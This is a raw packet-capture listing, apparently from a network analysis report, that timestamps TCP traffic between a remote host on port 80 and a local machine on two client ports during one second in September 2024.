                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485299110 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485305071 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485323906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485327959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485341072 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485351086 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485352993 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485356092 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485363007 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485368967 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485375881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485378027 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485379934 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485409975 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.485436916 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489578962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489584923 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489593029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489598036 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489609957 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489618063 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489648104 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489701986 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.489767075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490623951 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490628958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490647078 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490653992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490681887 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490710020 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490742922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490758896 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490768909 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490775108 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490806103 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.490829945 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492230892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492280006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492285013 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492331982 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492346048 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492352009 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492363930 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492407084 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492415905 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492423058 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.492470026 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494767904 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494851112 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494856119 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494905949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494911909 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494925022 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494927883 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494932890 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494961977 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494982958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.494987965 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495031118 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495393038 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495438099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495440960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495446920 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495491028 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495521069 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495528936 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495541096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495547056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495578051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495603085 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495611906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495779037 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495784044 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495831966 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495865107 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495872021 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495883942 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495892048 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495902061 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495920897 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495950937 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495979071 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495990992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.495997906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496026039 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496053934 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496093035 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496098995 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496110916 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496117115 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496124029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496149063 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496184111 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496186972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496517897 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496566057 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496570110 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496572018 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496598959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496618032 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496645927 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496700048 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496706009 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496716976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496722937 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496752024 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.496792078 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504146099 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504187107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504193068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504272938 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504283905 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504291058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504297972 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504307032 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504322052 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504331112 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504359007 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.504395008 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.561955929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.561975002 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.561986923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562134981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562141895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562149048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562150955 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562155962 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562165022 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562196016 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562230110 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562311888 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562319994 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562333107 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562340021 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562347889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562375069 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562521935 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562530041 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562536955 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562550068 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562566996 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562573910 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562583923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562592030 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562597990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562597990 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562642097 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.562642097 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563038111 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563045025 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563056946 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563062906 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563070059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563076973 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563088894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563096046 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563107014 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563148022 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563148022 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563189983 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563196898 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563210011 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563216925 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563224077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563230038 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563235998 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563251972 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563298941 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563440084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563446999 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563458920 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563465118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563472033 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563519001 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563519001 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563553095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563560963 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563572884 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563579082 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563584089 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563591003 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563601971 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563608885 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563613892 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563615084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563632011 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563640118 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563693047 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563693047 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.563994884 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564002037 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564022064 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564028978 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564039946 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564045906 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564058065 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564065933 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564079046 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564079046 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564157009 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564313889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564318895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564332008 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564340115 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564374924 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564398050 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564409971 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564416885 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564429045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564435959 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564440966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564455032 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564461946 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564475060 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564500093 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564500093 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564537048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564687014 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564853907 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564861059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564872980 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564879894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564884901 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564898014 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564903975 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564909935 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564922094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564928055 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564934015 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564945936 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564949036 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564949036 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.564954042 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565011978 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565011978 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565222025 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565228939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565236092 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565242052 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565253019 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565259933 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565265894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565270901 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565273046 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565285921 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565314054 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565339088 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565362930 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565371990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565377951 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565382957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565402985 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565408945 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565422058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565432072 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565432072 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565435886 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565449953 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565458059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565464020 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565475941 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565475941 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565483093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565495968 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565502882 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565510035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565516949 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565516949 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565557003 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.565557003 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.568666935 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.568684101 CEST8049734103.130.147.211192.168.2.8
